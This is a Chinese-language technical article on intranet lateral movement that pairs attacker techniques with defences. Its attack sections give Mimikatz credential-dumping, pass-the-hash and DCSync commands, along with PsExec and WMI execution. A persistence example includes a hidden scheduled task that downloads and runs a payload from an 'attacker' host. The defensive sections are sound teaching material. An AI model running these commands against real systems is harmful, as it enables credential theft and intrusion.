内网渗透横向攻击全流程解析：技术路径与防御策略

引言：内网横向渗透的战术价值

内网横向渗透（Lateral Movement）是APT攻击链中的核心环节，指攻击者在突破边界防御后，通过技术手段在内网中横向扩展控制范围的过程。其战术价值体现在三个方面：1）扩大攻击面以获取核心数据；2）规避单点检测实现持久化；3）构建多节点跳板降低溯源难度。根据MITRE ATT&CK框架统计，72%的定向攻击会实施横向移动，平均横向移动次数达3.2次。本文将系统拆解横向渗透的技术流程，揭示攻击者常用手法，并提出针对性防御方案。

一、攻击前奏：内网环境测绘

1.1 被动信息收集技术

攻击者首先通过被控主机实施被动信息收集，主要技术包括：

• ARP扫描：通过arp -a命令获取局域网IP-MAC映射表，识别存活主机
• NetBIOS枚举：使用nbtstat -A <IP>查询目标主机共享资源
• LLMNR/NBT-NS投毒：监听局域网名称解析请求，伪造响应获取用户凭证（需配合Responder工具）

1.2 主动探测技术

当被动收集不足时，攻击者会采用低频探测：

# Python示例：ICMP探测脚本（需root权限）
import os
def icmp_ping(ip):
    response = os.system(f"ping -c 1 -W 1 {ip} > /dev/null 2>&1")
    return response == 0
# 扫描C段
for i in range(1,255):
    ip = f"192.168.1.{i}"
    if icmp_ping(ip):
        print(f"[+] {ip} is alive")

• 端口扫描：使用masscan或nmap进行TCP SYN扫描（nmap -sS -p 445,139,3389 <IP>）
• 服务指纹识别：通过banner抓取识别开放服务版本

1.3 域环境信息获取

在域环境中，攻击者会重点收集：

• 域控制器信息：nltest /dclist:<域名>
• 域用户组：net group "Domain Admins" /domain
• GPO策略：gpresult /r /scope:computer

二、横向移动核心技术

2.1 凭证获取与复用

明文凭证捕获：

• 使用Mimikatz的sekurlsa::logonpasswords模块
• 内存转储分析：procdump -ma lsass.exe lsass.dmp后离线分析

哈希传递攻击（Pass-the-Hash）：

# 使用Invoke-Mimikatz进行PtH
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:contoso.com /ntlm:xxx /run:powershell.exe"'

• 适用场景：NTLM哈希复用
• 限制条件：需目标主机启用WDigest认证或使用LSASS保护绕过

票据传递攻击（Pass-the-Ticket）：

• 黄金票据：伪造KRBTGT账户的TGT
• 白银票据：伪造服务账户的TGS
• 检测点：关注4624事件中认证包类型为Kerberos的异常登录

2.2 远程代码执行技术

Windows远程管理（WinRM）：

# 启用WinRM（需管理员权限）
Enable-PSRemoting -Force
# 远程执行
Invoke-Command -ComputerName PC01 -ScriptBlock {Get-Process} -Credential $cred

• 防御建议：通过GPO禁用WinRM或限制IP访问

PSExec横向移动：

psexec.exe \\PC01 -u Administrator -p password cmd.exe

• 变种攻击：使用SharpExec等无文件落地工具
• 检测特征：4624事件中登录类型为3（网络）且来源IP异常

WMI横向移动：

# 使用WMI执行命令
$session = New-CimSession -ComputerName PC01 -Credential $cred
Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="notepad.exe"}

• 优势：绕过防火墙限制
• 防御：监控WMI事件ID 5861（远程进程创建）

2.3 信任关系利用

域信任渗透：

• 跨域认证：klist get kerb-contoso.com
• 森林信任枚举：nltest /domain_trusts

本地管理员组共享：

• 查询组成员：net localgroup administrators
• 检测建议：监控4732事件（本地组成员添加）

三、权限维持技术

3.1 持久化后门

计划任务：

# 创建隐藏计划任务
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1')`""
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -TaskName "UpdateChecker" -Action $action -Trigger $trigger -User "SYSTEM"

• 检测点：计划任务库中的异常任务

注册表自启动：

# 添加Run键值
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "SecurityChecker" -Value "C:\Windows\System32\cmd.exe /c powershell.exe -nop -w hidden -e <base64>"

• 防御：监控注册表键值变更（事件ID4657）

3.2 域控权限维持

DCSync攻击：

# 使用Mimikatz导出域哈希
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:contoso.com /user:krbtgt"'

• 防御：限制Replicating Directory Changes权限

黄金票据防护：

• 监控4769事件（TGS请求）中客户端名称异常
• 定期轮换KRBTGT账户密码

四、防御体系构建

4.1 检测技术

行为分析指标：

• 异常横向连接：同一源IP短时间连接多个内网主机
• 凭证复用：同一账户在不同主机登录
• 进程注入：lsass.exe进程异常内存操作

EDR解决方案：

• 部署具备横向移动检测能力的EDR（如CrowdStrike Falcon）
• 配置自定义检测规则：

  # Sigma规则示例：检测PSExec横向移动
  title: PSExec Horizontal Movement
  status: experimental
  logsource:
    category: process_creation
    product: windows
  detection:
    selection:
      Image|contains: '\\psexec'
    condition: selection

4.2 响应流程

应急响应步骤：

1. 隔离受感染主机（网络层面隔离）
2. 收集证据（内存转储、日志提取）
3. 威胁狩猎（查找横向移动痕迹）
4. 系统修复（补丁更新、凭证重置）

猎杀查询示例：

-- Splunk查询：查找异常远程登录
index=wineventlog EventCode=4624 LogonType=3 NOT (SourceNetworkAddress="192.168.1.100") | stats count by ComputerName, SourceNetworkAddress

4.3 零信任架构实施

关键措施：

• 实施最小权限原则
• 启用多因素认证
• 微隔离技术：通过NSX或Illumio实现工作负载级隔离
• 持续认证：基于用户行为的动态访问控制

五、典型案例分析

5.1 某金融企业攻击事件

攻击路径：

1. 通过钓鱼邮件获取前台PC权限
2. 使用Mimikatz获取域用户凭证
3. 通过PSExec横向移动至财务服务器
4. 植入勒索软件加密核心数据

防御失效原因：

• 未限制本地管理员权限
• WinRM服务未禁用
• 缺乏横向移动检测能力

5.2 防御改进方案

1. 实施LAPS管理本地管理员密码
2. 部署UEBA系统检测异常登录
3. 定期进行红队演练验证防御效果

结论：构建动态防御体系

内网横向渗透攻击的成功，本质上是防御体系存在静态弱点。企业应建立”检测-响应-预防”的闭环防御机制：通过EDR实现实时检测，利用SOAR实现自动化响应，结合零信任架构降低攻击面。建议每季度进行攻击面评估，每年开展红蓝对抗演练，持续提升安全运营能力。

（全文约3200字）